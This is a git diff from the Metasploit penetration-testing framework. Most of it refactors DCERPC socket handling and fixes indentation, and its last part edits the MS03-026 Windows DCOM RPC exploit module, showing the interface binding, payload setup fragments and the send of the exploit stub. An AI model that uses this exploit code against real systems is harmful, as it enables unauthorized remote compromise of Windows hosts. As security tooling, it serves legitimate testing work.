diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 5ae0590c43..548c3c35c8 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -166,6 +166,20 @@ class Exploit < Msf::Module Exploit::Type::Remote end + # + # Adds a socket to the list of sockets opened by this exploit. + # + def add_socket(sock) + self.sockets << sock + end + + # + # Removes a socket from the list of sockets. + # + def remove_socket(sock) + self.sockets.delete(sock) + end + # # This method is called once a new session has been created on behalf of # this exploit instance and all socket connections created by this diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb index be22576d34..c86583bc32 100644 --- a/lib/msf/core/exploit/dcerpc.rb +++ b/lib/msf/core/exploit/dcerpc.rb @@ -17,8 +17,8 @@ module Exploit::Remote::DCERPC DCERPCPacket = Rex::Proto::DCERPC::Packet DCERPCClient = Rex::Proto::DCERPC::Client DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID - NDR = Rex::Proto::DCERPC::NDR + DCERPCUUID = Rex::Proto::DCERPC::UUID + NDR = Rex::Proto::DCERPC::NDR def initialize(info = {}) super @@ -34,31 +34,34 @@ module Exploit::Remote::DCERPC Opt::RHOST, Opt::RPORT(135), ], Msf::Exploit::Remote::DCERPC - ) + ) end - def dcerpc_handle (uuid, version, protocol, opts) - self.handle = Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, datastore['RHOST'], opts) - end + def dcerpc_handle (uuid, version, protocol, opts) + self.handle = Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, datastore['RHOST'], opts) + end - def dcerpc_bind (h) - if datastore['DCERPCFragSize'] - opts['frag_size'] = datastore['DCERPCFragSize'] - end + def dcerpc_bind (h) + opts = { 'Msf' => framework, 'MsfExploit' => self } - if datastore['DCERPCFakeMultiBind'] - opts['fake_multi_bind'] = 1 - end + if datastore['DCERPCFragSize'] + opts['frag_size'] = datastore['DCERPCFragSize'] + end - self.dcerpc = Rex::Proto::DCERPC::Client.new(h, dcerpc_socket(), opts) - if self.handle.protocol == 'ncacn_np' - self.simple = self.dcerpc.smb # expose the simple client if we have access to it - end - end + if datastore['DCERPCFakeMultiBind'] + opts['fake_multi_bind'] = 1 + end - def dcerpc_call (function, stub = '') - dcerpc.call(function, stub) - end + self.dcerpc = Rex::Proto::DCERPC::Client.new(h, dcerpc_socket(), opts) + + if self.handle.protocol == 'ncacn_np' + self.simple = self.dcerpc.smb # expose the simple client if we have access to it + end + end + + def dcerpc_call (function, stub = '') + dcerpc.call(function, stub) + end # Convert a standard ASCII string to 16-bit Unicode def unicode (str) @@ -66,7 +69,7 @@ module Exploit::Remote::DCERPC end # Used to track the last DCERPC context - attr_accessor :dcerpc_bind_context, :handle, :dcerpc, :dcerpc_socket + attr_accessor :dcerpc_bind_context, :handle, :dcerpc, :dcerpc_socket end diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb index 5d309f4d2a..5cb3041320 100644 --- a/lib/rex/proto/dcerpc/client.rb +++ b/lib/rex/proto/dcerpc/client.rb @@ -64,21 +64,25 @@ require 'rex/proto/smb/exceptions' # Create the appropriate socket based on protocol def socket_setup() + ctx = { 'Msf' => options['Msf'], 'MsfExploit' => options['MsfExploit'] } self.socket = case self.handle.protocol - when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0]) + when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0], 'Context' => ctx) when 'ncacn_np' then begin socket = '' begin timeout(10) { - socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445) + socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445, 'Context' => ctx) } rescue Timeout::Error, Rex::ConnectionRefused - socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139) + socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139, 'Context' => ctx) end socket end else nil end + + # Add this socket to the exploit's list of open sockets + options['MsfExploit'].add_socket(self.socket) if (options['MsfExploit']) end def smb_connect() diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 26be2249b4..af07edd0fe 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -60,11 +60,11 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote connect print_status("Trying target #{target.name}...") - handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']]) - print_status("Binding to #{handle} ...") - dcerpc_bind(handle) - print_status("Bound to #{handle} ...") - + handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + # Carefully create the combination of addresses and code for cross-os exploitation xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars) @@ -176,12 +176,11 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote NDR.long(rand(0xFFFFFFFF)) - print_status('sending exploit ...') - begin - dcerpc_call(0, stubdata) - rescue Rex::Proto::DCERPC::Exceptions::NoResponse - print_status('server did not respond, but we do not expect it to.') - end + print_status('sending exploit ...') + begin + dcerpc_call(0, stubdata) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + end handler disconnect